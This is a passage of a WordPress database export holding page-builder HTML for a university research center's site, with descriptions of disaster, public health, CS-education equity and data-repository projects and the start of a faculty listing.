these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n            <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n            <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n                      districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n                      demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n                      and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">ORPHEUS</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c45\" id=\"about-7\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-873 style-local-126-c45 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"126-c46\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-874 style-local-126-c46 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-875-outer style-local-126-c47-outer\">\n            <div data-colibri-id=\"126-c47\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-875 style-local-126-c47 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c48\" class=\"h-global-transition-all h-heading style-876 style-local-126-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-876 style-local-126-c48\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">DICE Data Repository</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c50\" class=\"h-text h-text-component style-878 style-local-126-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(64, 85, 169);\">The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;</span></p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-879-outer style-local-126-c51-outer\">\n            <div data-colibri-id=\"126-c51\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-879 style-local-126-c51 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','publish','closed','closed','','our-research','','','2023-09-29 11:19:47','2023-09-29 15:19:47','',0,'https://gsudice.dataconn.net/?page_id=126',0,'page','',0),(138,1,'2023-09-29 11:36:36','2022-02-15 17:08:23',' ','','','publish','closed','closed','','138','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/?p=138',1,'nav_menu_item','',0),(141,1,'2022-02-15 17:16:42','2022-02-15 17:16:42','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-header-scaled-1.jpg','cropped-cropped-header-scaled-1.jpg','','inherit','open','closed','','cropped-cropped-header-scaled-1-jpg','','','2022-02-15 17:16:42','2022-02-15 17:16:42','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-header-scaled-1.jpg',0,'attachment','image/jpeg',0),(168,1,'2022-02-15 18:02:51','2022-02-15 18:02:51','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','publish','closed','closed','','168','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=168',0,'extb_post_json','',0),(181,1,'2022-02-15 18:06:08','2022-02-15 18:06:08','','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-15 18:06:08','2022-02-15 18:06:08','',122,'https://gsudice.dataconn.net/?p=181',0,'revision','',0),(182,1,'2022-02-15 18:06:18','2022-02-15 18:06:18','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c70\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c70 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c71-outer\">\n            <div data-colibri-id=\"182-c71\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c71 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c72\" class=\"h-global-transition-all h-heading style-986 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c72\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 